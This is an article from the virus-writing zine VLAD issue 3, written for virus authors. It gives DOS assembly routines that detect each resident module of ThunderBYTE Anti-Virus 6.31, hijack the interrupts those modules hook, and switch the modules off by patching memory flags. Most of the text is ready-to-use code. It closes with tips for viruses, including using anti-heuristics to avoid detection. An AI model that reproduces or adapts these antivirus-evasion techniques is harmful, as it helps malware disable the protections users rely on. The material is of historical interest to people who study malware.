T B A V M O N I T O R
Written by
Darkman/VLAD
Thanks for the idea to Conzouler and The Unforgiven of Immortal Riot
Read Immortal Riot's magazine Insane Reality
------------
Introduction
------------
This document is an example of how to detect, intercept and enable/disable
the memory resident programs of ThunderBYTE Anti-Virus: TbDriver, TbScanX,
TbCheck, TbMem, TbFile, TbDisk and TbLog.
-------------------------------
Thunderbyte B.V. about TbDriver
-------------------------------
Enable memory resident TBAV utilities: TbDriver
TbDriver does not provide much protection against viruses by itself, but
must be loaded in advance to enable the memory resident ThunderBYTE
Anti-Virus utilities, such as TbScanX, TbCheck, TbMem, TbFile and TbDisk
to perform properly. It also provides basic protection against ANSI
bombs and 'stealth' viruses.
-----------------------------
Interrupts hooked by TbDriver
-----------------------------
These interrupts are hooked by TbDriver:
INT 20h (DOS Program Terminate)
INT 21h (DOS Function call)
INT 27h (DOS Terminate and Stay Resident)
INT 29h (DOS Fast Console Output)
INT 2Fh (Software Multiplex)
----------------------
How to detect TbDriver
----------------------
The below code shows an example of how to detect TbDriver:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[29h*04h] ; Get address of interrupt 29h
cmp [si],2e53h ; TbDriver resident?
jne detectexit ; Not resident? Jump to detectexit
; Intercept TbDriver here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
This example must be used before interception of TbDriver.
-------------------------
How to intercept TbDriver
-------------------------
The below code shows an example of how to intercept all interupts hooked
by TbDriver:
;------------------------------------------------------------=< cut here >=-
lea di,int29adr ; DI = offset of int29adr
add si,43h ; SI = offset of original INT 29h
movsw ; Move address of original INT 29h
movsw ; " " " " " "
lea di,int2fadr ; DI = offset of int2fadr
add si,17h ; SI = offset of original INT 2fh
movsw ; Move address of original INT 2fh
movsw ; " " " " " "
lea di,int21adr ; DI = offset of int21adr
add si,0c4h ; SI = offset of original INT 21h
movsw ; Move address of original INT 21h
movsw ; " " " " " "
mov ds,ax ; DS = segment of interrupt vectors
mov word ptr ds:[20h*04h],offset int20h
mov ds:[20h*04h+02h],es ; Intercept interrupt 20h
mov word ptr ds:[21h*04h],offset int21h
mov ds:[21h*04h+02h],es ; Intercept interrupt 21h
mov word ptr ds:[27h*04h],offset int27h
mov ds:[27h*04h+02h],es ; Intercept interrupt 27h
mov word ptr ds:[29h*04h],offset int29h
mov ds:[29h*04h+02h],es ; Intercept interrupt 29h
mov word ptr ds:[2fh*04h],offset int2fh
mov ds:[2fh*04h+02h],es ; Intercept interrupt 2fh
;------------------------------------------------------------=< cut here >=-
--------------------------------------------------------
Necessary procedures and variables to intercept TbDriver
--------------------------------------------------------
These procedures and variable are necessary to emulate the original
interrupts:
;------------------------------------------------------------=< cut here >=-
int20h proc near ; DOS Program Terminate
xor ax,ax ; Terminate program
endp
int21h proc near ; DOS Function call
db 0eah ; Object code of jump far
int21adr dd ? ; Address of interrupt 21h
endp
int27h proc near ; DOS Terminate and Stay Resident
mov ah,31h ; Terminate and stay resident
mov cl,04h ; Multiply by paragraphs
shr dx,cl ; Calculate paragraphs
inc dx ; Increase DX
jmp short int21h
endp
int29h proc near ; DOS Fast Console Output
db 0eah ; Object code of jump far
int29adr dd ? ; Address of interrupt 29h
endp
int2fh proc near ; Software Multiplex
db 0eah ; Object code of jump far
int2fadr dd ? ; Address of interrupt 2fh
endp
;------------------------------------------------------------=< cut here >=-
------------------------------
Thunderbyte B.V. about TbScanX
------------------------------
Automatic scanning: TbScanX
TbScanX is the memory resident version of TbScan. This signature scanner
remains resident in memory and automatically scans those files which are
being executed, copied, de-archived, downloaded, etc. TbScanX does not
require much memory. It can swap itself into expanded, XMS, or high
memory, using only 1Kb of conventional memory.
----------------------------
Interrupts hooked by TbScanX
----------------------------
These interrupts are hooked by TbScanX:
INT 13h (BIOS Fixed disk/FDD Services)
INT 2Fh (Software Multiplex)
It may look like the below interrupt is hooked, because it pointers to the
code of TbScanX, but it is NOT hooked:
INT E1h (BASIC Reserved)
---------------------
How to detect TbScanX
---------------------
The below code shows an example of how to detect TbScanX:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[13h*04h] ; Get address of interrupt 13h
cmp [si],2e9ch ; TbScanX resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable or intercept TbScanX here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You can't detect or intercept TbScanX probably if TbDisk has hooked the
interrupt before or after, so please detect TbDisk before and after.
This example must used before enable/disable or interception of TbScanX.
------------------------
How to intercept TbScanX
------------------------
The below code shows an example of how to intercept interrupt 13h, which is
hooked by TbScanX:
;------------------------------------------------------------=< cut here >=-
lea di,int13adr ; DI = offset of int13adr
add si,66h ; SI = offset of original INT 13h
movsw ; Move address of original INT 13h
movsw ; " " " " " "
mov ds,ax ; DS = segment of interrupt vectors
mov word ptr ds:[13h*04h],offset int13h
mov ds:[13h*04h+02h],es ; Intercept interrupt 13h
;------------------------------------------------------------=< cut here >=-
It is easier to intercept interrupt 2fh from TbDriver, do that instead of
intercepting it from TbScanX.
-------------------------------------------------------
Necessary procedures and variables to intercept TbScanX
-------------------------------------------------------
These procedures and variable are necessary to emulate the original
interrupts:
;------------------------------------------------------------=< cut here >=-
int13h proc near ; BIOS Fixed disk/FDD Services
db 0eah ; Object code of jump far
int13adr dd ? ; Address of interrupt 13h
endp
;------------------------------------------------------------=< cut here >=-
---------------------
How to enable TbScanX
---------------------
The below code shows an example of how to enable TbScanX:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-12ch],00h
;------------------------------------------------------------=< cut here >=-
----------------------
How to disable TbScanX
----------------------
The below code shows an example of how to disable TbScanX:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-12ch],19h
;------------------------------------------------------------=< cut here >=-
------------------------------
Thunderbyte B.V. about TbCheck
------------------------------
Check while loading: TbCheck
TbCheck is a memory resident integrity checker. This program remains
resident in memory and checks automatically every file just before it is
being executed. TbCheck uses a fast integrity checking method, consuming
only 400 bytes of memory. It can be configured to reject files with
incorrect checksums, and/or to reject files that do not have a corres-
ponding Anti-Vir.Dat record.
----------------------------
Interrupts hooked by TbCheck
----------------------------
TbCheck does not hook interrupts.
And therefore you do not need to intercept it.
---------------------
How to detect TbCheck
---------------------
The below code shows an example of how to detect TbCheck:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[21h*04h] ; Get address of interrupt 21h
lds si,ds:[si+75h] ; Get address of TbCheck
cmp [si],3d9ch ; TbCheck resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable TbCheck here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You can't detect TbCheck probably if TbScanX, TbMem, TbFile, TbDisk or
TbLog has hooked the interrupt before, so please detect them before.
This example must used before enable/disable TbCheck.
---------------------
How to enable TbCheck
---------------------
The below code shows an example of how to enable TbCheck:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-69h],00h
;------------------------------------------------------------=< cut here >=-
----------------------
How to disable TbCheck
----------------------
The below code shows an example of how to disable TbCheck:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-69h],01h
;------------------------------------------------------------=< cut here >=-
----------------------------
Thunderbyte B.V. about TbMem
----------------------------
Controlling memory: TbMem
TbMem detects attempts from programs to remain resident in memory, and
ensures that no program can remain resident in memory without permis-
sion. Since most viruses remain resident in memory, this is a powerful
weapon against all such viruses, known or unknown. Permission informa-
tion is maintained in the Anti-Vir.Dat files. TbMem also protects your
CMOS memory against unwanted modifications.
--------------------------
Interrupts hooked by TbMem
--------------------------
These interrupts are hooked by TbMem:
INT 09h (IRQ 1 Keyboard)
INT 2Fh (Software Multiplex)
-------------------
How to detect TbMem
-------------------
The below code shows an example of how to detect TbMem:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[09h*04h] ; Get address of interrupt 09h
cmp [si],2e50h ; TbMem resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable or intercept TbMem here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
This example must used before enable/disable or interception of TbMem.
----------------------
How to intercept TbMem
----------------------
The below code shows an example of how to intercept interrupt 09h, which is
hooked by TbMem:
;------------------------------------------------------------=< cut here >=-
lea di,int09adr ; DI = offset of int09adr
add si,3ch ; SI = offset of original INT 09h
movsw ; Move address of original INT 09h
movsw ; " " " " " "
mov ds,ax ; DS = segment of interrupt vectors
mov word ptr ds:[09h*04h],offset int09h
mov ds:[09h*04h+02h],es ; Intercept interrupt 09h
;------------------------------------------------------------=< cut here >=-
It is easier to intercept interrupt 2fh from TbDriver, do that instead of
intercepting it from TbMem.
-----------------------------------------------------
Necessary procedures and variables to intercept TbMem
-----------------------------------------------------
These procedures and variable are necessary to emulate the original
interrupts:
;------------------------------------------------------------=< cut here >=-
int09h proc near ; IRQ 1 Keyboard
db 0eah ; Object code of jump far
int09adr dd ? ; Address of interrupt 09h
endp
;------------------------------------------------------------=< cut here >=-
-------------------
How to enable TbMem
-------------------
The below code shows an example of how to enable TbMem:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-253h],28h
;------------------------------------------------------------=< cut here >=-
--------------------
How to disable TbMem
--------------------
The below code shows an example of how to disable TbMem:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-253h],29h
;------------------------------------------------------------=< cut here >=-
-----------------------------
Thunderbyte B.V. about TbFile
-----------------------------
Preventing infection: TbFile
TbFile detects attempts from programs to infect other programs. It also
guards read-only attributes, detects illegal time-stamps, etc. It will
make sure that no virus succeeds in infecting programs.
---------------------------
Interrupts hooked by TbFile
---------------------------
TbFile does not hook interrupts.
And therefore you do not need to intercept it.
--------------------
How to detect TbFile
--------------------
The below code shows an example of how to detect TbFile:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[21h*04h] ; Get address of interrupt 21h
lds si,ds:[si+75h] ; Get address of TbFile
cmp [si],2e9ch ; TbFile resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable TbFile here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You can't detect TbFile probably if TbScanX, TbCheck, TbMem, TbDisk or
TbLog has hooked the interrupt before, so please detect them before.
This example must used before enable/disable TbFile.
--------------------
How to enable TbFile
--------------------
The below code shows an example of how to enable TbFile:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0c5h],00h
;------------------------------------------------------------=< cut here >=-
---------------------
How to disable TbFile
---------------------
The below code shows an example of how to disable TbFile:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0c5h],01h
;------------------------------------------------------------=< cut here >=-
-----------------------------
Thunderbyte B.V. about TbDisk
-----------------------------
Protecting the disk: TbDisk
TbDisk is a disk guard program which detects attempts from programs to
write directly to disk (without using DOS), attempts to format, etc.,
and makes sure that no malicious program will succeed in destroying your
data. This utility also traps tunneling and direct calls into the BIOS
code. Permission information about the rare programs that write directly
and/or format the disk is maintained in the Anti-Vir.Dat files.
---------------------------
Interrupts hooked by TbDisk
---------------------------
These interrupts are hooked by TbDisk:
INT 13h (BIOS Fixed disk/FDD Services)
INT 15h (BIOS System Services)
INT 26h (DOS Absolute Disk Write)
INT 2Fh (Software Multiplex)
INT 40h (BIOS Diskette Service)
--------------------
How to detect TbDisk
--------------------
The below code shows an example of how to detect TbDisk:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[26h*04h] ; Get address of interrupt 26h
cmp [si],2e9ch ; TbDisk resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable or intercept TbDisk here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You can't detect or intercept TbDisk probably if TbScanX has hooked the
interrupt before or after, so please detect TbScanX before and after.
This example must used before enable/disable or interception of TbDisk.
-----------------------
How to intercept TbDisk
-----------------------
The below code shows an example of how to intercept interrupt 13h, 15h, 26h
and 40h, which is hooked by TbDisk:
;------------------------------------------------------------=< cut here >=-
lea di,int26adr ; DI = offset of int26adr
add si,0fh ; SI = offset of original INT 26h
movsw ; Move address of original INT 26h
movsw ; " " " " " "
lea di,int40adr ; DI = offset of int40adr
add si,18h ; SI = offset of original INT 40h
movsw ; Move address of original INT 40h
movsw ; " " " " " "
lea di,int13adr ; DI = offset of int13adr
add si,2bh ; SI = offset of original INT 13h
movsw ; Move address of original INT 13h
movsw ; " " " " " "
lea di,int15adr ; DI = offset of int15adr
add si,18h ; SI = offset of original INT 15h
movsw ; Move address of original INT 15h
movsw ; " " " " " "
mov ds,ax ; DS = segment of interrupt vectors
mov word ptr ds:[13h*04h],offset int13h
mov ds:[13h*04h+02h],es ; Intercept interrupt 13h
mov word ptr ds:[15h*04h],offset int15h
mov ds:[15h*04h+02h],es ; Intercept interrupt 15h
mov word ptr ds:[26h*04h],offset int26h
mov ds:[26h*04h+02h],es ; Intercept interrupt 26h
mov word ptr ds:[40h*04h],offset int40h
mov ds:[40h*04h+02h],es ; Intercept interrupt 40h
;------------------------------------------------------------=< cut here >=-
It is easier to intercept interrupt 2fh from TbDriver, do that instead of
intercepting it from TbDisk.
------------------------------------------------------
Necessary procedures and variables to intercept TbDisk
------------------------------------------------------
These procedures and variable are necessary to emulate the original
interrupts:
;------------------------------------------------------------=< cut here >=-
int13h proc near ; BIOS Fixed disk/FDD Services
db 0eah ; Object code of jump far
int13adr dd ? ; Address of interrupt 13h
endp
int15h proc near ; BIOS System Services
db 0eah ; Object code of jump far
int15adr dd ? ; Address of interrupt 15h
endp
int26h proc near ; DOS Absolute Disk Write
db 0eah ; Object code of jump far
int26adr dd ? ; Address of interrupt 26h
endp
int40h proc near ; BIOS Diskette Service
db 0eah ; Object code of jump far
int40adr dd ? ; Address of interrupt 40h
endp
;------------------------------------------------------------=< cut here >=-
--------------------
How to enable TbDisk
--------------------
The below code shows an example of how to enable TbDisk:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0bah],00h
;------------------------------------------------------------=< cut here >=-
---------------------
How to disable TbDisk
---------------------
The below code shows an example of how to disable TbDisk:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0bah],01h
;------------------------------------------------------------=< cut here >=-
----------------------------
Thunderbyte B.V. about TbLog
----------------------------
The purpose of TbLog
TbLog is a TBAV log file utility. It writes a record into a log file
whenever one of the resident TBAV utilities pops up with an alert
message. Also when TbScan detects a virus a record will be written.
--------------------------
Interrupts hooked by TbLog
--------------------------
This interrupt is hooked by TbLog:
INT 2Fh (Software Multiplex)
It is easier to intercept interrupt 2fh from TbDriver, do that instead of
intercepting it from TbLog.
-------------------
How to detect TbLog
-------------------
The below code shows an example of how to detect TbLog:
;------------------------------------------------------------=< cut here >=-
push ds ; Save DS at stack
xor ax,ax ; Clear AX
mov ds,ax ; DS = segment of interrupt vectors
lds si,ds:[2fh*04h] ; Get address of interrupt 2fh
cmp [si],0fd3dh ; TbLog resident?
jne detectexit ; Not resident? Jump to detectexit
; Enable/disable TbLog here...
detectexit:
pop ds ; Load DS from stack
;------------------------------------------------------------=< cut here >=-
You can't detect TbLog probably if TbScanX, TbMem or TbDisk has hooked the
interrupt before, so please detect them before.
This example must used before enable/disable TbLog.
-------------------
How to enable TbLog
-------------------
The below code shows an example of how to enable TbLog:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0a2h],00h
;------------------------------------------------------------=< cut here >=-
--------------------
How to disable TbLog
--------------------
The below code shows an example of how to disable TbLog:
;------------------------------------------------------------=< cut here >=-
mov byte ptr ds:[si-0a2h],01h
;------------------------------------------------------------=< cut here >=-
---------------------
Final tips and tricks
---------------------
- These examples were tested with ThunderBYTE Anti-Virus v 6.31.
- Only intercept those interrupts the virus uses.
- Use a lot anti-heuristic's, so other programs can't find the virus either.
- Remember to optimize your code.
- VLAD #3 INDEX -